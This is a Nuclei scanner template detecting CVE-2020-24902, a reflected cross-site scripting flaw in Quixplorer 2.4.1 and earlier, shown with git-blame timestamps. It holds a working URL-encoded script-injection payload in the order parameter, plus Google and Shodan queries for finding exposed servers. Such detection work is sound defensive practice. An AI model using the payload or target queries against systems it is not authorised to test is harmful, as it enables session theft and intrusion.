nuclei-templates/http/cves/2020/CVE-2020-24902.yaml

49 lines
1.4 KiB
YAML
Raw Normal View History

2022-09-30 15:04:15 +00:00
id: CVE-2020-24902
info:
name: Quixplorer <=2.4.1 - Cross-Site Scripting
2022-09-30 15:04:15 +00:00
author: edoardottt
severity: medium
description: |
Quixplorer through 2.4.1 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
2022-09-30 15:04:15 +00:00
reference:
- https://dl.packetstormsecurity.net/1804-exploits/quixplorer241beta-xss.txt
- https://nvd.nist.gov/vuln/detail/CVE-2020-24902
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
2022-09-30 15:04:15 +00:00
cve-id: CVE-2020-24902
cwe-id: CWE-79
2022-09-30 15:06:54 +00:00
metadata:
google-query: intitle:"My Download Server"
shodan-query: http.title:"My Download Server"
verified: "true"
2022-09-30 15:04:15 +00:00
tags: cve,cve2020,quixplorer,xss
http:
2022-09-30 15:04:15 +00:00
- method: GET
path:
2022-11-15 16:44:20 +00:00
- '{{BaseURL}}/index.php?action=post&order=bszop%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
2022-09-30 15:04:15 +00:00
2022-11-15 16:44:20 +00:00
host-redirects: true
max-redirects: 2
2022-09-30 15:04:15 +00:00
matchers-condition: and
matchers:
- type: word
2022-11-15 16:44:20 +00:00
part: body
2022-09-30 15:04:15 +00:00
words:
2022-11-15 16:44:20 +00:00
- "<script>alert(document.domain)</script>&srt=yes"
- "My Download"
condition: and
2022-09-30 15:04:15 +00:00
- type: word
2022-11-15 16:44:20 +00:00
part: header
2022-09-30 15:04:15 +00:00
words:
2022-11-15 16:44:20 +00:00
- text/html
- type: status
status:
- 200
# Enhanced by md on 2022/12/08